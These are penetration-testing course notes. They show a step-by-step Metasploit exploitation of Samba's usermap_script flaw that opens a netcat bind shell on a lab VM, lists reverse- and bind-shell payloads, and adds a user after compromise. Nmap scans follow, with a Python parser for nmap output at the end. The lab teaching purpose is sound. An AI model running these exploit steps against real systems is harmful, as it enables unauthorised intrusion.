Penetration Testing Training, March 13
Day 1: Summary of the main labs
First, a Struts2 vulnerability was exploited to execute arbitrary commands directly and take control of the host.
Lab environment:
Kali Linux as the attack platform; OWASP as the target machine.
The 2003 and Metasploitable VMs were confirmed to be reachable.
Use Metasploit to attack the target's Samba service and obtain a shell:
search samba                        find the module
use multi/samba/usermap_script      select the exploit module
show payloads                       list the payloads compatible with this exploit module
set payload cmd/unix/bind_netcat    use netcat to provide the shell once the exploit succeeds
show options                        list the parameters that need to be set
set RHOST 10.10.10.254              set the target host
exploit                             launch the attack
1. Install the virtual machine software, start the Kali, OWASP and Metasploitable VMs and set up the environment so that the machines can reach each other over the network; the network is configured in NAT mode with the address range 10.10.10.0/24.
2. Start the Kali VM and switch to root.
First enter msfconsole and change the initial password to 123456:
msf > passwd
[*] exec: passwd
输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码
Then look for the Samba modules:
msf > search samba
Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                         normal     Samba read_nttrans_ea_list Integer Overflow
   exploit/freebsd/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                 2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/lsa_transnames_heap         2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap          2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans                     2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap           2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/osx/samba/trans2open                    2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   exploit/solaris/samba/lsa_transnames_heap       2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   exploit/unix/misc/distcc_exec                   2002-02-01       excellent  DistCC Daemon Command Execution
   exploit/unix/webapp/citrix_access_gateway_exec  2010-12-21       excellent  Citrix Access Gateway Command Execution
   exploit/windows/http/sambar6_search_results     2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   exploit/windows/license/calicclnt_getconfig     2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   post/linux/gather/enum_configs                                   normal     Linux Gather Configurations
Select the exploit module:
msf > use multi/samba/usermap_script
List the payloads compatible with this exploit module:
msf exploit(usermap_script) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank       Description
   ----                                ---------------  ----       -----------
   cmd/unix/bind_awk                                    normal     Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_inetd                                  normal     Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_lua                                    normal     Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal     Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal     Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                   normal     Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal     Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                   normal     Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal     Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_zsh                                    normal     Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal     Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal     Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal     Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_lua                                 normal     Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_netcat                              normal     Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal     Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                             normal     Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal     Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal     Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal     Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal     Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                          normal     Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_ruby                                normal     Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal     Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                   normal     Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                 normal     Unix Command Shell, Reverse TCP (via Zsh)
Select the netcat payload, which provides the shell once the exploit succeeds:
msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
List the parameters that need to be set:
msf exploit(usermap_script) > show options
Set the target host:
msf exploit(usermap_script) > set RHOST 10.10.10.254
RHOST => 10.10.10.254
Launch the attack:
msf exploit(usermap_script) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800
Control of the 10.10.10.254 machine has now been obtained; for example, a user can be added with useradd test, and the user was created successfully.
Host discovery notes:
-PU: UDP ping; -sn: ping scan only, no port or service listing; -Pn: do not use ping (skip host discovery).
nmap -sS -Pn xx.xx.xx.xx                        TCP SYN scan, no ICMP sent
nmap -sV -Pn xx.xx.xx.xx                        list detailed service information
nmap -PO -script=smb-check-vulns xx.xx.xx.xx    check for the MS08-067 vulnerability
nmap scanning
msf > nmap
msf > nmap -sV -Pn 10.10.10.254
[*] exec: nmap -sV -Pn 10.10.10.254

Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CST
Nmap scan report for 10.10.10.254
Host is up (0.00020s latency).
All 1000 scanned ports on 10.10.10.254 are filtered
MAC Address: 00:50:56:E7:1B:31 (VMware)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds
msf > nmap -PO -script=smb-check-vulns 10.10.10.254
[*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254

Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CST
Nmap scan report for 10.10.10.254
Host is up (0.00021s latency).
All 1000 scanned ports on 10.10.10.254 are filtered
MAC Address: 00:50:56:E7:1B:31 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds
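Added example (my own code, not part of the course notes): a Python parser for the nmap normal-output format shown in the scans above, so the results of an inventory scan of your own lab range can be checked programmatically rather than read by eye. The first host block is the page's own scan; the second host (10.10.10.3) and its port table are constructed sample input, and smb_exposed lists hosts that answer on 139/445, the service the lab targets.

```python
import re

# Constructed sample of nmap normal output: the first host block is the scan from
# the notes, the second is made up to show the per-port table -sV prints.
SAMPLE_OUTPUT = """\
Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:38 CST
Nmap scan report for 10.10.10.254
Host is up (0.00020s latency).
All 1000 scanned ports on 10.10.10.254 are filtered
MAC Address: 00:50:56:E7:1B:31 (VMware)

Nmap scan report for 10.10.10.3
Host is up (0.00031s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:50:56:AA:BB:CC (VMware)

Nmap done: 2 IP addresses (2 hosts up) scanned in 23.06 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
ALL_RE = re.compile(r"^All (\d+) scanned ports on \S+ are (\w+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-F:]{17})")


def parse_nmap(text):
    """Parse nmap normal output into one dict per host block."""
    hosts, cur = [], None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            cur = {"host": m.group(1), "mac": None, "all_ports": None, "ports": []}
            hosts.append(cur)
        elif cur is None:
            continue  # header lines before the first host block
        elif m := PORT_RE.match(line):
            cur["ports"].append({"port": int(m.group(1)), "proto": m.group(2),
                                 "state": m.group(3), "service": m.group(4),
                                 "version": m.group(5).strip()})
        elif m := ALL_RE.match(line):
            cur["all_ports"] = m.group(2)  # e.g. "filtered" or "closed"
        elif m := MAC_RE.match(line):
            cur["mac"] = m.group(1)
    return hosts


def smb_exposed(hosts):
    """Hosts with an open SMB port (139/445), the service attacked in this lab."""
    return [h["host"] for h in hosts
            if any(p["port"] in (139, 445) and p["state"] == "open" for p in h["ports"])]
```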